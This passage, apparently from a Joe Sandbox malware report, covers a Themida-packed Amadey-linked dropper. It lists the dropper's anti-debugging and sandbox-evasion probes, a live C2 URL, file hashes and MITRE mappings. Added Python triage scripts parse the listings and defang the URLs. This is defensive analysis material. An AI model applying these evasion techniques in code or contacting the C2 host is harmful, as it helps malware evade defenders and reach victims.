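    discards = after[:2] == [["pop", "edx"], ["pop", "eax"]]
    return {
        "first": first, "second": second, "insn_count": len(insns),
        "shielded": shielded, "effective": effective, "discards_result": discards,
    }


def chain_records(records):
    """Link records whose second address is another record's first address,
    giving the runs of back-to-back rdtsc reads."""
    by_first = {r[0]: r for r in records}
    seconds = {r[1] for r in records}
    chains = []
    for start in (r for r in records if r[0] not in seconds):
        addrs, cur, seen = [start[0]], start, set()
        while cur and cur[0] not in seen:
            seen.add(cur[0])
            addrs.append(cur[1])
            cur = by_first.get(cur[1])
        chains.append(addrs)
    return chains


def summarize(text):
    """Per-record analysis plus the consecutive-rdtsc chains."""
    records = parse_records(text)
    return [analyze(r) for r in records], chain_records(records)


if __name__ == "__main__":
    analyses, chains = summarize(SAMPLE)
    for a in analyses:
        print("%07X -> %07X insns=%2d shielded=%2d discarded=%-5s effective=%s"
              % (a["first"], a["second"], a["insn_count"], a["shielded"],
                 a["discards_result"], a["effective"]))
    print("rdtsc runs:", [[hex(x) for x in c] for c in chains])
```

On these eight listings the only instructions left at bracket depth zero that are not stack or jump noise are test ebx, ebx, je ... and cmp ebx, FFFFFFFFh, and six of the eight timestamps are overwritten before anything reads them. Joe Sandbox flags rdtsc pairs whether or not the result is consumed, so a pass like this separates protector noise from a real timing comparison before reverse-engineering time is spent on it.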

                    Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05460D0E rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00EC652B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ECA302 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00EAD3E2 cpuid
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00EACBEA GetSystemTimePreciseAsFileTime, GetSystemTimePreciseAsFileTime
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E965E0 LookupAccountNameA
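The per-thread sleep lines in the preceding block and the probe lines in this one are easier to judge as a summary. The Python below is an added example, not Joe Sandbox code and not from the sample: it parses a handful of those lines (constructed from the report text, with path and signature run together exactly as the report prints them), totals the sleep per thread, compares it with the 0h 5m 52s overall analysis duration reported further down, and buckets the anti-analysis probes. It reads the sleep values as milliseconds: the report prints an "s" suffix, but 475 calls x 30000 ms is exactly the reported 14250000, and the flagged delay time 180000 is the 3-minute long sleep. The tool attributions in KNOWN_PROBES are this example's annotation, not something the report states.

```python
"""Aggregate per-thread sleep lines and anti-analysis probes from a Joe Sandbox
behaviour listing into a triage summary.

Added example for this report, not Joe Sandbox code. Assumptions: sleep values
are milliseconds despite the printed "s" suffix, and the tool names in
KNOWN_PROBES are this example's own annotation of the probed strings.
"""
import re
from collections import defaultdict

ANALYSIS_BUDGET_S = 5 * 60 + 52      # "Overall analysis duration: 0h 5m 52s"
SKOTES = r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

# Constructed input: behaviour lines copied from the report; the path and the
# signature text are run together, as the report prints them.
SAMPLE_LINES = [
    SKOTES + " TID: 5780Thread sleep time: -58029s >= -30000s",
    SKOTES + " TID: 4340Thread sleep count: 38 > 30",
    SKOTES + " TID: 4340Thread sleep time: -76038s >= -30000s",
    SKOTES + " TID: 5596Thread sleep count: 475 > 30",
    SKOTES + " TID: 5596Thread sleep time: -14250000s >= -30000s",
    SKOTES + " TID: 2676Thread sleep time: -360000s >= -30000s",
    SKOTES + " TID: 6044Thread sleep count: 1168 > 30",
    SKOTES + " TID: 6044Thread sleep time: -2337168s >= -30000s",
    SKOTES + " TID: 3192Thread sleep count: 1122 > 30",
    SKOTES + " TID: 3192Thread sleep time: -2245122s >= -30000s",
    SKOTES + "Open window title or class name: gbdyllo",
    SKOTES + "Open window title or class name: procmon_window_class",
    SKOTES + "File opened: SICE",
    SKOTES + "Thread information set: HideFromDebugger",
    SKOTES + "Process queried: DebugPort",
    SKOTES + r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
]

# The minus sign is the NtDelayExecution relative-interval convention.
SLEEP_RE = re.compile(r"TID: (\d+)\s*Thread sleep (count|time): -?(\d+)")
PROBE_RE = re.compile(
    r"(Open window title or class name|File opened|Thread information set|"
    r"Process queried|Registry key queried): (.+)$"
)
# Window classes/titles probed via FindWindow and device names opened via
# CreateFile; the tool attribution is this example's, not the report's.
KNOWN_PROBES = {
    "ollydbg": "OllyDbg window class",
    "gbdyllo": "OllyDbg ('ollydbg' reversed)",
    "procmon_window_class": "Sysinternals Process Monitor",
    "process monitor - sysinternals: www.sysinternals.com": "Sysinternals Process Monitor",
    "regmonclass": "Sysinternals Regmon",
    "registry monitor - sysinternals: www.sysinternals.com": "Sysinternals Regmon",
    "filemonclass": "Sysinternals Filemon",
    "file monitor - sysinternals: www.sysinternals.com": "Sysinternals Filemon",
    "ntice": "SoftICE driver device",
    "sice": "SoftICE driver device",
    "siwvid": "SoftICE video driver device",
}


def parse_sleeps(lines):
    """Per TID: number of sleep calls (only printed when > 30) and total ms."""
    threads = defaultdict(lambda: {"count": None, "total_ms": 0})
    for line in lines:
        m = SLEEP_RE.search(line)
        if not m:
            continue
        tid, kind, value = int(m.group(1)), m.group(2), int(m.group(3))
        if kind == "count":
            threads[tid]["count"] = value
        else:
            threads[tid]["total_ms"] = value
    return dict(threads)


def stall_report(threads, budget_s=ANALYSIS_BUDGET_S):
    """Seconds slept per thread, average per call, and whether that single
    thread would have outlasted the sandbox's analysis window on its own."""
    report = {}
    for tid, t in threads.items():
        total_s = t["total_ms"] / 1000
        report[tid] = {
            "total_s": total_s,
            "per_call_ms": t["total_ms"] // t["count"] if t["count"] else None,
            "outlasts_sandbox": total_s > budget_s,
        }
    return report


def total_sleep_ms(threads):
    return sum(t["total_ms"] for t in threads.values())


def parse_probes(lines):
    """Bucket probes: tool windows/devices, debugger API checks, VM-revealing
    registry reads."""
    probes = {"window_or_device": [], "debugger_api": [], "registry": []}
    for line in lines:
        m = PROBE_RE.search(line)
        if not m:
            continue
        kind, value = m.groups()
        if kind in ("Open window title or class name", "File opened"):
            probes["window_or_device"].append((value, KNOWN_PROBES.get(value.lower(), "unknown")))
        elif kind == "Registry key queried":
            probes["registry"].append(value)
        else:
            probes["debugger_api"].append(kind + ": " + value)
    return probes


if __name__ == "__main__":
    threads = parse_sleeps(SAMPLE_LINES)
    for tid, row in sorted(stall_report(threads).items()):
        print(tid, row)
    print("total slept: %.1f h" % (total_sleep_ms(threads) / 3.6e6))
    print(parse_probes(SAMPLE_LINES))
```

Thread 5596 alone sleeps 30 s per call 475 times, nearly four hours against a six-minute analysis, and the six threads together account for about 5.4 hours. The run still completed because the sandbox's API interceptor modified the Sleep calls (the "149471x Sleep call for process: skotes.exe modified" entry further down); that entry is the thing to check before trusting timing-dependent results from a Themida-packed sample like this one.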

                    Stealing of Sensitive Information

Source: Yara match | File source: 2.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1743788410.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1786941479.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques with at least one matching signature; the number is the count of matching signatures. The unmatched cells of the full matrix are omitted.

Reconnaissance, Resource Development, Initial Access: no matching signatures
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1)
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: no matching signatures
Discovery: System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
Lateral Movement: no matching signatures
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Exfiltration, Impact: no matching signatures
Behavior Graph (ID: 1559376, Sample: file.exe, Startdate: 20/11/2024, Architecture: WINDOWS, Score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 7 other signatures

file.exe (started)
    dropped: C:\Users\user\AppData\Local\...\skotes.exe, PE32
    dropped: C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII
    signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
    started: skotes.exe
        signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

skotes.exe (started from the start node, not as a child of file.exe)
    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (window names); Machine Learning detection for dropped file

skotes.exe (started from the start node, not as a child of file.exe)
    network: 185.215.113.43 (ports 49783, 49799, 49815 as listed in the graph), WHOLESALECONNECTIONSNL, Portugal
    signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Antivirus detection, initial sample (Source | Detection | Scanner | Label)
file.exe | 53% | ReversingLabs | Win32.Packed.Themida
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 53% | ReversingLabs | Win32.Packed.Themida

Antivirus detection, unpacked PE files: no antivirus matches
Antivirus detection, domains: no antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label)
http://185.215.113.43/Zu7JuNko/index.php32 | 100% | Avira URL Cloud | malware
http://185.215.113.43/Zu7JuNko/index.phpdedO | 100% | Avira URL Cloud | malware
http://185.215.113.43/Zu7JuNko/index.php# | 100% | Avira URL Cloud | phishing
http://185.215.113.43/Zu7JuNko/index.phpm | 100% | Avira URL Cloud | malware
                    No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.43/Zu7JuNko/index.php | false | | high

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
http://185.215.113.43/Zu7JuNko/index.php32 | skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.php# | skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded | skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpH | skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpX | skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpm | skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpdedO | skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/ | skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | false | | high
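The memory strings above are one URL followed by whatever bytes happened to sit after it in the dump (32, #, ncoded, H, X, m, dedO). The Python below is an added example, not part of the report: it normalises such strings back to a canonical URL, ranks candidates by how many distinct residues follow the same boundary (many different byte sequences after one boundary is strong evidence that the boundary is the real end of the string), and defangs the result for sharing. Its assumption, which is this example's and not the report's, is that bytes after a recognised script extension (.php here) are residue unless they form a query string; the extension list is also this example's own. Note the reputation column above rates the canonical URL "high" and not malicious while Avira flags three of the suffixed variants; the IP table below marks 185.215.113.43 as malicious and the context entries tie this path to Amadey, so the path, not the reputation score, is the indicator worth sharing.

```python
"""Canonicalise C2 URL strings recovered from process memory and emit
shareable, defanged indicators.

Added example for this report, not Joe Sandbox code. Assumption: bytes that
follow a recognised script name in a memory string are residue of whatever
lay after the URL in the dump, unless they start a query string.
"""
import re
from collections import defaultdict

# Constructed input: the strings listed under "URLs from memory and binaries".
MEMORY_URLS = [
    "http://185.215.113.43/Zu7JuNko/index.php32",
    "http://185.215.113.43/Zu7JuNko/index.php#",
    "http://185.215.113.43/Zu7JuNko/index.phpncoded",
    "http://185.215.113.43/Zu7JuNko/index.phpH",
    "http://185.215.113.43/Zu7JuNko/index.phpX",
    "http://185.215.113.43/Zu7JuNko/index.phpm",
    "http://185.215.113.43/Zu7JuNko/index.phpdedO",
    "http://185.215.113.43/",
]

URL_RE = re.compile(r"^(https?://[^/\s]+)(/\S*)?$")
# Longest alternatives first so "aspx" is not cut as "asp" + "x"; the list is
# this example's own choice of common server-side script extensions.
SCRIPT_RE = re.compile(r"^(.*?/[^/?#]*?\.(?:aspx|asp|php|jsp|html|htm|cgi))(.*)$", re.I)


def split_residue(path):
    """'/dir/index.php32' -> ('/dir/index.php', '32'); a query string is kept
    as part of the path because it is legitimately part of a URL."""
    m = SCRIPT_RE.match(path)
    if not m:
        return path, ""
    clean, residue = m.group(1), m.group(2)
    if residue.startswith("?"):
        return path, ""
    return clean, residue


def canonicalize(raw_urls):
    """Map canonical URL -> list of residues that followed it in memory."""
    groups = defaultdict(list)
    for raw in raw_urls:
        m = URL_RE.match(raw.strip())
        if not m:
            continue                      # not a URL-shaped string, skip it
        origin, path = m.group(1), m.group(2) or "/"
        clean, residue = split_residue(path)
        groups[origin + clean].append(residue)
    return dict(groups)


def rank_iocs(groups):
    """Most distinct residues first: a boundary followed by many different byte
    sequences is almost certainly the true end of the string."""
    return sorted(groups.items(),
                  key=lambda kv: (len(set(kv[1])), len(kv[0])), reverse=True)


def defang(url):
    """hxxp:// and bracketed dots in the host only; the path is left readable."""
    m = URL_RE.match(url)
    origin, path = m.group(1), m.group(2) or ""
    return origin.replace("http", "hxxp", 1).replace(".", "[.]") + path


def ioc_report(raw_urls):
    """Ranked (defanged URL, number of distinct residues, residues) tuples."""
    return [(defang(url), len(set(res)), sorted(set(res)))
            for url, res in rank_iocs(canonicalize(raw_urls))]


if __name__ == "__main__":
    for url, n, residues in ioc_report(MEMORY_URLS):
        print("%-50s distinct residues=%d %s" % (url, n, residues))
```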
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.215.113.43 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1559376
                              Start date and time:2024-11-20 13:06:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                              EGA Information:
                              • Successful, ratio: 25%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target file.exe, PID 6760 because it is empty
• Execution Graph export aborted for target skotes.exe, PID 1136 because there are no executed functions
• Execution Graph export aborted for target skotes.exe, PID 5752 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
Time | Type | Description
07:08:02 | API Interceptor | 149471x Sleep call for process: skotes.exe modified
12:07:03 | Task Scheduler | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Joe Sandbox View, IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | Amadey | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 185.215.113.43/Zu7JuNko/index.php

Joe Sandbox View, Domains: no context

Joe Sandbox View, ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16

No context

Joe Sandbox View, Dropped Files (Match | Associated Sample Name / URL | Detection | Threat Name)
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1863680
                                Entropy (8bit):7.949970010980385
                                Encrypted:false
                                SSDEEP:49152:2IQaFswVmOsXVQ8VUoKKa7T2oJnBFuC9:2pa6UmHXV1U/Ka32SL1
                                MD5:EBE6DE9BE122D27057536193303F1F89
                                SHA1:199B00D481006678F3A2DB4902910A883BE2F275
                                SHA-256:BACE923F8BE90BF0F398E9310D52723265E250651CB36115BC233CA3300160A6
                                SHA-512:C10AFDF10124390958160A5FC5B2AC7EEAA3ED4705A8B4BBA89AA1AC17128FA8979CF9081B1997A9D8A03ED6C2C756878DA9A8B96162C84B1F3B52EAB55EE5D8
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 53%
                                Joe Sandbox View:
                                • Filename: file.exe, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f............................. J...........@..........................PJ......x....@.................................W...k.......H.....................J.............................0.J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... ..*.........................@...ihqucnpr.`....0..R..................@...loaatlni......J......J..............@....taggant.0... J.."...N..............@...................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):284
                                Entropy (8bit):3.4012587809509416
                                Encrypted:false
                                SSDEEP:6:lNDaMdtXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBxl/3ut0:lNbdZf2RKQ1CGAFAjzvYRQVBj/3ut0
                                MD5:516A437E33DA772906B2717607E4FD55
                                SHA1:39C8A303564CC27E1919FED0BAF1E2D2E034C82B
                                SHA-256:FD385CA8E6206E31B26B1F4D3A86DA71AD552C84F899FED74136EBE334E1E7D9
                                SHA-512:D69B9909CE1A8CB81063DB618DEC36F11FCF56754DD360D6E9F011C3CBA5B85F186B77EDDA360F20248C20C02F79D1310EE46EB4066E1FF5C8E1606D7EDA3AD3
                                Malicious:false
                                Reputation:low
                                Preview:..........NI....)j.YF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.949970010980385
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'863'680 bytes
                                MD5:ebe6de9be122d27057536193303f1f89
                                SHA1:199b00d481006678f3a2db4902910a883be2f275
                                SHA256:bace923f8be90bf0f398e9310d52723265e250651cb36115bc233ca3300160a6
                                SHA512:c10afdf10124390958160a5fc5b2ac7eeaa3ed4705a8b4bba89aa1ac17128fa8979cf9081b1997a9d8a03ed6c2c756878da9a8b96162c84b1f3b52eab55ee5d8
                                SSDEEP:49152:2IQaFswVmOsXVQ8VUoKKa7T2oJnBFuC9:2pa6UmHXV1U/Ka32SL1
                                TLSH:FF8533911B47307EE86682F523AF848CBBB4BE62D3D61E38E619CA7533154DB425E0DC
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x8a2000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F6F311CC80Ah
